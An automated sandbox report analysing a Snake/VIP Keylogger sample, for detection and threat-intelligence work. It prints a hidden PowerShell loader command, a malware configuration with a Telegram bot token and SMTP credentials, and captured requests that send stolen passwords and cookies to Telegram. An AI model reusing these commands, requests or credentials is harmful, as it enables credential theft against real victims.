Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Kb94RzMYNf.exe

Overview

General Information

Sample name:Kb94RzMYNf.exe
renamed because original name is a hash value
Original sample name:f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
Analysis ID:1588331
MD5:ee18481e218cc9bc7a1628f5a7365776
SHA1:57ea302c84a488de1e5a5bcc669e02c5d9a7a350
SHA256:f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Kb94RzMYNf.exe (PID: 7916 cmdline: "C:\Users\user\Desktop\Kb94RzMYNf.exe" MD5: EE18481E218CC9BC7A1628F5A7365776)
    • powershell.exe (PID: 7988 cmdline: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5752 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendMessage"}
{"Exfil Mode": "Telegram", "Username": "abraher@abraher.com", "Password": "General1", "Host": "mail.abraher.com", "Port": "587", "Token": "8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y", "Chat_id": "7171338311", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Process Memory Space: msiexec.exe PID: 5752JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 5752JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5752, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49978
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7988, TargetFilename: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 82.194.91.193, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5752, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49998
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) ", CommandLine: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Kb94RzMYNf.exe", ParentImage: C:\Users\user\Desktop\Kb94RzMYNf.exe, ParentProcessId: 7916, ParentProcessName: Kb94RzMYNf.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) ", ProcessId: 7988, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:07:35.434003+010028033053Unknown Traffic192.168.2.1049982104.21.16.1443TCP
            2025-01-11T00:07:36.802620+010028033053Unknown Traffic192.168.2.1049984104.21.16.1443TCP
            2025-01-11T00:07:38.180425+010028033053Unknown Traffic192.168.2.1049986104.21.16.1443TCP
            2025-01-11T00:07:39.500978+010028033053Unknown Traffic192.168.2.1049988104.21.16.1443TCP
            2025-01-11T00:07:42.260446+010028033053Unknown Traffic192.168.2.1049992104.21.16.1443TCP
            2025-01-11T00:07:44.901196+010028033053Unknown Traffic192.168.2.1049996104.21.16.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:07:33.507170+010028032742Potentially Bad Traffic192.168.2.1049980132.226.247.7380TCP
            2025-01-11T00:07:34.866831+010028032742Potentially Bad Traffic192.168.2.1049980132.226.247.7380TCP
            2025-01-11T00:07:36.194675+010028032742Potentially Bad Traffic192.168.2.1049983132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:07:28.723789+010028032702Potentially Bad Traffic192.168.2.1049978142.250.184.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:08:03.369784+010018100081Potentially Bad Traffic192.168.2.1049999149.154.167.220443TCP
            2025-01-11T00:08:13.281560+010018100081Potentially Bad Traffic192.168.2.1050001149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T00:07:45.916213+010018100071Potentially Bad Traffic192.168.2.1049997149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "abraher@abraher.com", "Password": "General1", "Host": "mail.abraher.com", "Port": "587", "Token": "8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y", "Chat_id": "7171338311", "Version": "4.4"}
            Source: msiexec.exe.5752.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendMessage"}
            Source: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exeReversingLabs: Detection: 52%
            Source: Kb94RzMYNf.exeVirustotal: Detection: 72%Perma Link
            Source: Kb94RzMYNf.exeReversingLabs: Detection: 52%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exeJoe Sandbox ML: detected
            Source: Kb94RzMYNf.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Kb94RzMYNf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.10:49981 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49978 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.10:49979 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2
            Source: Kb94RzMYNf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_24500853
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_24500040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450FAB9h5_2_2450F810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450D3A1h5_2_2450D0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450CF49h5_2_2450CCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450D7F9h5_2_2450D550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24502C19h5_2_24502968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 245031E0h5_2_2450310E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 245031E0h5_2_24502DC4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 245031E0h5_2_24502DC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450DC51h5_2_2450D9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450E501h5_2_2450E258
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_24500673
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450E0A9h5_2_2450DE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450E959h5_2_2450E6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450F209h5_2_2450EF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450EDB1h5_2_2450EB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24500D0Dh5_2_24500B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24501697h5_2_24500B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2450F661h5_2_2450F3B8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49997 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49999 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.10:49998 -> 82.194.91.193:587
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20048707%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3282708daf7eHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32ae06876375Host: api.telegram.orgContent-Length: 1277
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewASN Name: ACENS_ASSpainHostinghousingandVPNservicesES ACENS_ASSpainHostinghousingandVPNservicesES
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49983 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49980 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49978 -> 142.250.184.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49992 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49982 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49986 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49996 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49984 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49988 -> 104.21.16.1:443
            Source: global trafficTCP traffic: 192.168.2.10:49998 -> 82.194.91.193:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.10:49981 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20048707%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: mail.abraher.com
            Source: unknownHTTP traffic detected: POST /bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3282708daf7eHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 23:07:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://abraher.com
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.abraher.com
            Source: Kb94RzMYNf.exe, Kb94RzMYNf.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: Kb94RzMYNf.exe, Kb94RzMYNf.exe.2.drString found in binary or memory: http://www.skinstudio.netG
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
